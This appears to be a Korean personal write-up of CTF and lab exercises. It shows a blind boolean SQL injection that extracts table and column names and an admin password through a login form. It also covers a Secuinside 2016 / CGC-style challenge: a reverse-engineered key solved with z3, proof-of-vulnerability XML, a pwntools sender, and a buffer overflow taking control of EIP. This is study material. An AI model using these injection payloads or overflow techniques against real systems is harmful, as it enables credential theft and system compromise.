앞만 보고 가는거야!!!

[SQL Injection Query]

' or 1=1 #
 ' or 1=1 --

[Request]

1) Success. // 성공

2) Login Failed // 실패

[[ 데이터 베이스 확인 ]]

id= ' or 1=1 and 1=1 order by 1.2 #

- Response : Success

id= ' or 1=1 and 1=1 order by 1.2.3 #

- Response : Login Failed

[[ 테이블(information_schema.tables) 추출 ]]

:: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 110 #

- Response : Login Failed

:: 첫번째 문자열 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 108 #

- Response : Success

:: 확실히 맞는지 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) = 109 #

- Response : Success

:: 두번째 문자열 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),2,1)) = 109 #

- Response : Success

:: 마지막 문자열 확인

' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),7,1)) = 0 #

[[ column 추출 - information_schema.columns ]]

--> 테이블 명에서 찾은 "member"를 활용

:: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임

' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 110 #
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 53)#

:: 첫번째 컬럼
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) = 110)#
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),2,1)) = 111)#
no

:: 두번째 컬럼
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),1,1)) = 105)#
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),2,1)) = 100)#
id

[[ 저장된 값 찾기 ]]

' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) > 100)#
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) = 115)#

' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),16,1)) =0)#

vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : aaaaaaaaaaaaaaa
Get out of here :(

int main_sub_8048F50()
{
  char v1; // [esp+70h] [ebp-448h]@1
  char v2; // [esp+B0h] [ebp-408h]@3
  char v3; // [esp+B1h] [ebp-407h]@4
  int v4; // [esp+4B0h] [ebp-8h]@1

  v4 = 0;
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("-          Simple Echo System          -\n");
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("What is your name?\n");
  sub_8048E90(&v1);
  if ( sub_8048E10((int)&v1, (int)"ADMIN", 5u) )
  {
    sub_8049FC0("Hi %s\n");
    sub_8049FC0(": ");
    *(&v2 + sub_80480A0(&v2, 1000, 10)) = 0;
    sub_8049FC0("%s\n");
  }
  else
  {
    sub_8049FC0("+ Gimme a key : ");
    sub_80480A0(&01_byte_805F454, 27, 10);
    if ( compare_key_sub_8048150() )
    {
      sub_8049FC0("Welcome Admin :)\n");
      sub_8049FC0(": ");
      sub_80480A0(&v2, 1000, 10);
      if ( v2 == 'C' && v3 == 'K' )
        MEMORY[0] = 10;
      sub_8049FC0("%s\n");
    }
    else
    {
      sub_8049FC0("Get out of here :(\n");
    }
  }
  return 0;
}
 

_BOOL4 compare_key_sub_8048150()
{
  signed int v1; // [esp+0h] [ebp-4h]@1

  v1 = 0;
  if ( 21_byte_805F468
     + 04_byte_805F457
     + 13_byte_805F460
     + 22_byte_805F469
     + 24_byte_805F46B
     + 08_byte_805F45B
     + 02_byte_805F455
     + 07_byte_805F45A
     + 10_byte_805F45D
     + 18_byte_805F465
     + 12_byte_805F45F
     + 19_byte_805F466
     + 06_byte_805F459 == 1068 )
    v1 = 1;
  if ( 11_byte_805F45E
     + 08_byte_805F45B
     + 10_byte_805F45D
     + 18_byte_805F465
     + 19_byte_805F466
     + 23_byte_805F46A
     + 03_byte_805F456
     + 02_byte_805F455
     + 14_byte_805F461
     + 16_byte_805F463 == 760 )
    ++v1;
  if ( 15_byte_805F462
     + 02_byte_805F455
     + 10_byte_805F45D
     + 17_byte_805F464
     + 01_byte_805F454
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 13_byte_805F460
     + 21_byte_805F468
     + 06_byte_805F459
     + 23_byte_805F46A
     + 22_byte_805F469 == 997 )
    ++v1;
  if ( 05_byte_805F458
     + 09_byte_805F45C
     + 20_byte_805F467
     + 22_byte_805F469
     + 02_byte_805F455
     + 07_byte_805F45A
     + 24_byte_805F46B
     + 14_byte_805F461
     + 17_byte_805F464
     + 13_byte_805F460 == 782 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 19_byte_805F466
     + 17_byte_805F464
     + 14_byte_805F461
     + 03_byte_805F456
     + 08_byte_805F45B
     + 07_byte_805F45A
     + 21_byte_805F468
     + 15_byte_805F462 == 778 )
    ++v1;
  if ( 21_byte_805F468
     + 20_byte_805F467
     + 06_byte_805F459
     + 10_byte_805F45D
     + 05_byte_805F458
     + 15_byte_805F462
     + 23_byte_805F46A
     + 22_byte_805F469
     + 04_byte_805F457
     + 25_byte_805F46C
     + 13_byte_805F460
     + 24_byte_805F46B
     + 19_byte_805F466
     + 14_byte_805F461 == 1123 )
    ++v1;
  if ( 23_byte_805F46A
     + 09_byte_805F45C
     + 06_byte_805F459
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 08_byte_805F45B
     + 11_byte_805F45E
     + 02_byte_805F455
     + 19_byte_805F466
     + 01_byte_805F454
     + 15_byte_805F462
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B == 1180 )
    ++v1;
  if ( 06_byte_805F459
     + 25_byte_805F46C
     + 12_byte_805F45F
     + 24_byte_805F46B
     + 20_byte_805F467
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 04_byte_805F457
     + 09_byte_805F45C
     + 14_byte_805F461
     + 21_byte_805F468
     + 19_byte_805F466
     + 03_byte_805F456
     + 10_byte_805F45D
     + 18_byte_805F465
     + 08_byte_805F45B
     + 13_byte_805F460 == 1498 )
    ++v1;
  if ( 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 05_byte_805F458
     + 25_byte_805F46C
     + 02_byte_805F455
     + 01_byte_805F454
     + 22_byte_805F469
     + 06_byte_805F459
     + 17_byte_805F464
     + 08_byte_805F45B
     + 13_byte_805F460
     + 16_byte_805F463
     + 21_byte_805F468
     + 04_byte_805F457 == 1213 )
    ++v1;
  if ( 18_byte_805F465
     + 22_byte_805F469
     + 10_byte_805F45D
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 15_byte_805F462
     + 21_byte_805F468
     + 02_byte_805F455
     + 09_byte_805F45C
     + 25_byte_805F46C == 779 )
    ++v1;
  if ( 01_byte_805F454
     + 04_byte_805F457
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 16_byte_805F463
     + 21_byte_805F468
     + 05_byte_805F458 == 742 )
    ++v1;
  if ( 16_byte_805F463
     + 24_byte_805F46B
     + 20_byte_805F467
     + 07_byte_805F45A
     + 18_byte_805F465
     + 11_byte_805F45E
     + 09_byte_805F45C
     + 05_byte_805F458
     + 06_byte_805F459
     + 12_byte_805F45F
     + 02_byte_805F455
     + 10_byte_805F45D
     + 15_byte_805F462
     + 04_byte_805F457
     + 21_byte_805F468 == 1196 )
    ++v1;
  if ( 07_byte_805F45A
     + 02_byte_805F455
     + 09_byte_805F45C
     + 14_byte_805F461
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 13_byte_805F460
     + 22_byte_805F469
     + 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 16_byte_805F463
     + 23_byte_805F46A
     + 18_byte_805F465 == 1091 )
    ++v1;
  if ( 22_byte_805F469
     + 18_byte_805F465
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 02_byte_805F455
     + 19_byte_805F466
     + 20_byte_805F467
     + 13_byte_805F460 == 764 )
    ++v1;
  if ( 14_byte_805F461
     + 17_byte_805F464
     + 23_byte_805F46A
     + 02_byte_805F455
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 18_byte_805F465
     + 15_byte_805F462
     + 11_byte_805F45E
     + 05_byte_805F458
     + 09_byte_805F45C
     + 08_byte_805F45B
     + 01_byte_805F454
     + 19_byte_805F466
     + 07_byte_805F45A
     + 22_byte_805F469
     + 21_byte_805F468
     + 10_byte_805F45D == 1463 )
    ++v1;
  if ( 16_byte_805F463 + 09_byte_805F45C + 02_byte_805F455 + 12_byte_805F45F + 22_byte_805F469 + 20_byte_805F467 == 465 )
    ++v1;
  if ( 17_byte_805F464
     + 19_byte_805F466
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 05_byte_805F458
     + 20_byte_805F467
     + 13_byte_805F460
     + 02_byte_805F455
     + 07_byte_805F45A
     + 14_byte_805F461
     + 01_byte_805F454
     + 22_byte_805F469 == 955 )
    ++v1;
  if ( 07_byte_805F45A
     + 08_byte_805F45B
     + 22_byte_805F469
     + 19_byte_805F466
     + 01_byte_805F454
     + 10_byte_805F45D
     + 15_byte_805F462
     + 18_byte_805F465 == 654 )
    ++v1;
  if ( 02_byte_805F455
     + 03_byte_805F456
     + 17_byte_805F464
     + 13_byte_805F460
     + 24_byte_805F46B
     + 01_byte_805F454
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 21_byte_805F468
     + 19_byte_805F466
     + 23_byte_805F46A
     + 08_byte_805F45B
     + 16_byte_805F463 == 1030 )
    ++v1;
  if ( 23_byte_805F46A + 24_byte_805F46B + 12_byte_805F45F == 275 )
    ++v1;
  if ( 22_byte_805F469
     + 04_byte_805F457
     + 02_byte_805F455
     + 21_byte_805F468
     + 01_byte_805F454
     + 09_byte_805F45C
     + 13_byte_805F460 == 563 )
    ++v1;
  if ( 15_byte_805F462 + 06_byte_805F459 + 12_byte_805F45F + 19_byte_805F466 + 18_byte_805F465 + 25_byte_805F46C == 509 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 13_byte_805F460
     + 22_byte_805F469
     + 17_byte_805F464
     + 25_byte_805F46C
     + 15_byte_805F462 == 556 )
    ++v1;
  if ( 02_byte_805F455
     + 13_byte_805F460
     + 22_byte_805F469
     + 20_byte_805F467
     + 19_byte_805F466
     + 03_byte_805F456
     + 04_byte_805F457
     + 12_byte_805F45F
     + 16_byte_805F463
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 18_byte_805F465
     + 25_byte_805F46C
     + 09_byte_805F45C
     + 06_byte_805F459
     + 11_byte_805F45E
     + 21_byte_805F468
     + 17_byte_805F464 == 1464 )
    ++v1;
  if ( 15_byte_805F462
     + 22_byte_805F469
     + 08_byte_805F45B
     + 23_byte_805F46A
     + 21_byte_805F468
     + 06_byte_805F459
     + 17_byte_805F464
     + 11_byte_805F45E
     + 12_byte_805F45F == 758 )
    ++v1;
  return v1 == 25;
} 

babyhack@ubuntu:~$ python scripts/mk_make.py --python --pypkgdir=/usr/lib/python2.7/dist-packages

babyhack@ubuntu:~$ cd ./build/make; sudo make install

from z3 import *

var_0 = Int('var_0')
var_1 = Int('var_1')
var_2 = Int('var_2')
var_3 = Int('var_3')
var_4 = Int('var_4')
var_5 = Int('var_5')
var_6 = Int('var_6')
var_7 = Int('var_7')
var_8 = Int('var_8')
var_9 = Int('var_9')
var_10 = Int('var_10')
var_11 = Int('var_11')
var_12 = Int('var_12')
var_13 = Int('var_13')
var_14 = Int('var_14')
var_15 = Int('var_15')
var_16 = Int('var_16')
var_17 = Int('var_17')
var_18 = Int('var_18')
var_19 = Int('var_19')
var_20 = Int('var_20')
var_21 = Int('var_21')
var_22 = Int('var_22')
var_23 = Int('var_23')
var_24 = Int('var_24')
var_25 = Int('var_25')

solve(var_20 + var_3 + var_12 + var_21 + var_23 + var_7 + var_1 + var_6 + var_9 + var_17 + var_11 + var_18 + var_5 == 1068,var_10 + var_7 + var_9 + var_17 + var_18 + var_22 + var_2 + var_1 + var_13 + var_15 == 760,var_14 + var_1 + var_9 + var_16 + var_0 + var_13 + var_15 + var_11 + var_12 + var_20 + var_5 + var_22 + var_21 == 997,var_4 + var_8 + var_19 + var_21 + var_1 + var_6 + var_23 + var_13 + var_16 + var_12 == 782,var_19 + var_10 + var_18 + var_16 + var_13 + var_2 + var_7 + var_6 + var_20 + var_14 == 778,var_20 + var_19 + var_5 + var_9 + var_4 + var_14 + var_22 + var_21 + var_3 + var_24 + var_12 + var_23 + var_18 + var_13 == 1123,var_22 + var_8 + var_5 + var_13 + var_15 + var_11 + var_7 + var_10 + var_1 + var_18 + var_0 + var_14 + var_19 + var_2 + var_23 == 1180,var_5 + var_24 + var_11 + var_23 + var_19 + var_22 + var_0 + var_4 + var_3 + var_8 + var_13 + var_20 + var_18 + var_2 + var_9 + var_17 + var_7 + var_12 == 1498,var_18 + var_23 + var_14 + var_4 + var_24 + var_1 + var_0 + var_21 + var_5 + var_16 + var_7 + var_12 + var_15 + var_20 + var_3 == 1213,var_17 + var_21 + var_9 + var_10 + var_6 + var_14 + var_20 + var_1 + var_8 + var_24 == 779,var_0 + var_3 + var_19 + var_2 + var_23 + var_22 + var_15 + var_20 + var_4 == 742,var_15 + var_23 + var_19 + var_6 + var_17 + var_10 + var_8 + var_4 + var_5 + var_11 + var_1 + var_9 + var_14 + var_3 + var_20 == 1196,var_6 + var_1 + var_8 + var_13 + var_11 + var_24 + var_12 + var_21 + var_18 + var_23 + var_14 + var_15 + var_22 + var_17 == 1091,var_21 + var_17 + var_22 + var_0 + var_4 + var_1 + var_18 + var_19 + var_12 == 764,var_13 + var_16 + var_22 + var_1 + var_11 + var_24 + var_17 + var_14 + var_10 + var_4 + var_8 + var_7 + var_0 + var_18 + var_6 + var_21 + var_20 + var_9 == 1463,var_15 + var_8 + var_1 + var_11 + var_21 + var_19 == 465,var_16 + var_18 + var_11 + var_24 + var_4 + var_19 + var_12 + var_1 + var_6 + var_13 + var_0 + var_21 == 955,var_6 + var_7 + var_21 + var_18 + var_0 + var_9 + var_14 + var_17 == 654,var_1 + var_2 + var_16 + var_12 + var_23 + var_0 + var_10 + var_6 + var_20 + var_18 + var_22 + var_7 + var_15 == 1030,var_22 + var_23 + var_11 == 275,var_21 + var_3 + var_1 + var_20 + var_0 + var_8 + var_12 == 563,var_14 + var_5 + var_11 + var_18 + var_17 + var_24 == 509,var_19 + var_10 + var_12 + var_21 + var_16 + var_24 + var_14 == 556,var_1 + var_12 + var_21 + var_19 + var_18 + var_2 + var_3 + var_11 + var_15 + var_23 + var_22 + var_17 + var_24 + var_8 + var_5 + var_10 + var_20 + var_16 == 1464,var_14 + var_21 + var_7 + var_22 + var_20 + var_5 + var_16 + var_10 + var_11 == 758)  

[ result ]

babyhack@ubuntu:~/tmp/Secuinside/2016$ python exp.py
[var_16 = 89,
 var_23 = 85,
 var_20 = 82,
 var_1 = 72,
 var_6 = 69,
 var_12 = 77,
 var_15 = 51,
 var_19 = 85,
 var_22 = 95,
 var_21 = 78,
 var_5 = 77,
 var_14 = 78,
 var_11 = 95,
 var_9 = 72,
 var_3 = 87,
 var_10 = 69,
 var_17 = 95,
 var_4 = 95,
 var_7 = 95,
 var_8 = 84,
 var_2 = 79,
 var_13 = 48,
 var_18 = 84,
 var_24 = 80,
 var_0 = 83]
babyhack@ubuntu:~/tmp/Secuinside/2016$  

[ covert ]

babyhack@ubuntu:~/tmp/Secuinside/2016$ cat sort.py
var_16 = 89
var_23 = 85
var_20 = 82
var_1 = 72
var_6 = 69
var_12 = 77
var_15 = 51
var_19 = 85
var_22 = 95
var_21 = 78
var_5 = 77
var_14 = 78
var_11 = 95
var_9 = 72
var_3 = 87
var_10 = 69
var_17 = 95
var_4 = 95
var_7 = 95
var_8 = 84
var_2 = 79
var_13 = 48
var_18 = 84
var_24 = 80
var_0 = 83

print chr(var_0)+chr(var_1)+chr(var_2)+chr(var_3)+chr(var_4)+chr(var_5)+chr(var_6)+chr(var_7)+chr(var_8)+chr(var_9)+chr(var_10)+chr(var_11)+chr(var_12)+chr(var_13)+chr(var_14)+chr(var_15)+chr(var_16)+chr(var_17)+chr(var_18)+chr(var_19)+chr(var_20)+chr(var_21)+chr(var_22)+chr(var_23)+chr(var_24)
babyhack@ubuntu:~/tmp/Secuinside/2016$

[ result ]

babyhack@ubuntu:~/tmp/Secuinside/2016$ python sort.py
SHOW_ME_THE_M0N3Y_TURN_UP
babyhack@ubuntu:~/tmp/Secuinside/2016$ 

 vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : HOW_ME_THE_M0N3Y_TURN_UP
Get out of here :(
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: SHOW_ME_THE_M0N3Y_TURN_UP
Hi SHOW_ME_THE_M0N3Y_TURN_UP
:

vagrant@crs:~$
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : SHOW_ME_THE_M0N3Y_TURN_UP
Welcome Admin :)
: CK
Segmentation fault (core dumped)
vagrant@crs:~$

<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
       <cbid>service</cbid>

        <replay>
              // recv
              <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>-          Simple Echo System          -\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>What is your name?\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>name: \x0a</data></match></read>
              // send
              <write><data>ADMIN\x0a</data></write>

              // recv
              <read><delim>\x0a</delim><match><data>+ Gimme a key : \x0a</data></match></read>
              // send
              <write><data>SHOW_ME_THE_M0N3Y_TURN_UP\x0a</data></write>
              // recv
              <read><delim>\x0a</delim><match><data>Welcome Admin :)\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>: \x0a</data></match></read>

              // send
              <write><data>CK\x0a</data></write>
        </replay>
</pov>

#!/usr/bin/python
from pwn import *

xml_name = "pov.xml"
host, port = "127.0.0.1", 1234
r = remote(host,port)
print r.recvline()
r.sendline("XML")
payload = open(xml_name,'rb').read()
print r.recvline()
r.sendline(str(len(payload)))
print r.recvline()
r.sendline(payload)

r.interactive()

vagrant@crs:~$ cgc2elf cykor_00001
vagrant@crs:~$ ls
cykor_00001 

signed int sub_80481C0()
{
  char v1; // [esp+3Ch] [ebp-2Ch]@3
  char v2; // [esp+3Dh] [ebp-2Bh]@9
  char v3; // [esp+3Eh] [ebp-2Ah]@10
  char v4; // [esp+3Fh] [ebp-29h]@11
  char v5; // [esp+40h] [ebp-28h]@12
  char v6; // [esp+41h] [ebp-27h]@13
  char v7; // [esp+42h] [ebp-26h]@14
  char v8; // [esp+43h] [ebp-25h]@15
  char v9; // [esp+44h] [ebp-24h]@16
  char v10; // [esp+45h] [ebp-23h]@17
  char v11; // [esp+46h] [ebp-22h]@18
  char v12; // [esp+47h] [ebp-21h]@19
  char v13; // [esp+48h] [ebp-20h]@20
  char v14; // [esp+49h] [ebp-1Fh]@21
  char v15; // [esp+4Ah] [ebp-1Eh]@22
  char v16; // [esp+4Bh] [ebp-1Dh]@23
  int v17; // [esp+54h] [ebp-14h]@26
  unsigned int i; // [esp+58h] [ebp-10h]@1
  int v19; // [esp+60h] [ebp-8h]@1

  v19 = 0;
  for ( i = 0; i < 0x18; ++i )
    *(&v1 + i) = 0;
  if ( sub_8048470(1, (int)"What is your message?\n", 0x16u) )
    sub_804867C(0);
  if ( sub_8048560(0, (int)&v1, 0x18u, 10) )
    return -1;
  if ( v1 != 'H' || v2 != '4' )
    return 7;
  if ( v3 != 'P' || v4 != 'P' )
    return 6;
  if ( v5 != 'Y' || v6 != '_' )
    return 5;
  if ( v7 != 'S' || v8 != '3' )
    return 4;
  if ( v9 != 'C' || v10 != 'U' )
    return 3;
  if ( v11 != 'I' || v12 != 'N' )
    return 2;
  if ( v13 != 'S' || v14 != 'I' )
    return 1;
  if ( v15 == 'D' && v16 == '3' && sub_8048470(1, (int)"+ Are you serious?\n", 0x13u) )
    sub_804867C(0);
  v17 = sub_8048 

signed int sub_80480A0()
{
  char v1[64]; // [esp+28h] [ebp-50h]@3
  int v2; // [esp+68h] [ebp-10h]@1
  unsigned int i; // [esp+6Ch] [ebp-Ch]@1

  v2 = 0;
  for ( i = 0; i < 64; ++i )
    v1[i] = 0;
  if ( sub_8048560(0, (int)v1, 128u, 10) )
    return -1;
  for ( i = 0; v1[i]; ++i )
    ++v2;
  if ( sub_8048470(1, (int)"- Why so serious?\n", 0x12u) )
    sub_804867C(0);
  return v2;
} 

vagrant@crs:~$ (python -c 'print "H4PPY_S3CUINSID3" + "\n" + "a"*84 + "b"*4';cat ) |./cykor_00001_cgc_file
What is your message?
+ Are you serious?
- Why so serious?

Segmentation fault (core dumped)
vagrant@crs:~$ gdb ./cykor_00001_cgc_file core                                  GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./cykor_00001_cgc_file...(no debugging symbols found)...done.

warning: core file may not match specified executable file.
[New LWP 3833]
Core was generated by `'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x62626262 in ?? ()
(gdb) i r
eax            0x616161a6       1633771942
ecx            0x12     18
edx            0x80487bf        134514623
ebx            0x0      0
esp            0xbaaaaf8c       0xbaaaaf8c
ebp            0x61616161       0x61616161
esi            0x61616161       1633771873
edi            0x0      0
eip            0x62626262       0x62626262
eflags         0x10292  [ AF SF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x7b     123
gs             0x7b     123
(gdb) q
vagrant@crs:~$ 

<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
       <cbid>service</cbid>

        <replay>
              // recv
              <read><delim>\x0a</delim><match><data>What is your message?\x0a</data></match></read>
              // send
              <write><data>H4PPY_S3CUINSID3\x0a</data></write>

              // recv
              <read><delim>\x0a</delim><match><data>+ Are you serious?\x0a</data></match></read>
              // send, [a * 84]
              <write><data>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x0a</data></write>

              // recv
              <read><delim>\x0a</delim><match><data>- Are you serious?\x0a</data></match></read>
        </replay>
</pov>

payload = open('crattack.xml', 'rb').read()

print r.recvuntil( 'XML)' )

r.sendline(payload)

print r.recv()

CGC 환경 설정 파일을 vagrant 폴더에 복사 합니다.

2016-08-02  오후 02:28    <DIR>          .
2016-08-02  오후 02:28    <DIR>          ..
2016-08-02  오후 02:28    <DIR>          .vagrant
2015-12-21  오후 10:33         2,526,208 vagrant.exe
2016-08-02  오후 12:14             2,573 Vagrantfile

C:\HashiCorp\Vagrant\bin>vagrant.exe up
Bringing machine 'cb' up with 'virtualbox' provider...
Bringing machine 'ids' up with 'virtualbox' provider...
Bringing machine 'pov' up with 'virtualbox' provider...
Bringing machine 'crs' up with 'virtualbox' provider...
Bringing machine 'ti' up with 'virtualbox' provider...
==> cb: Checking if box 'cgc-linux-dev' is up to date...
==> cb: Clearing any previously set forwarded ports...
==> cb: Clearing any previously set network interfaces...
==> cb: Preparing network interfaces based on configuration...
    cb: Adapter 1: nat
    cb: Adapter 2: hostonly
==> cb: Forwarding ports...
    cb: 22 (guest) => 2222 (host) (adapter 1)
==> cb: Running 'pre-boot' VM customizations...
==> cb: Booting VM...
==> cb: Waiting for machine to boot. This may take a few minutes...
    cb: SSH address: 127.0.0.1:2222
    cb: SSH username: vagrant
    cb: SSH auth method: private key

............

C:\HashiCorp\Vagrant\bin>vagrant.exe status
Current machine states:

cb                        running (virtualbox)
ids                       running (virtualbox)
pov                       running (virtualbox)
crs                       running (virtualbox)
ti                        running (virtualbox)

This environment represents multiple VMs. The VMs are all listed
above with their current state. For more information about a specific
VM, run `vagrant status NAME`.

.....................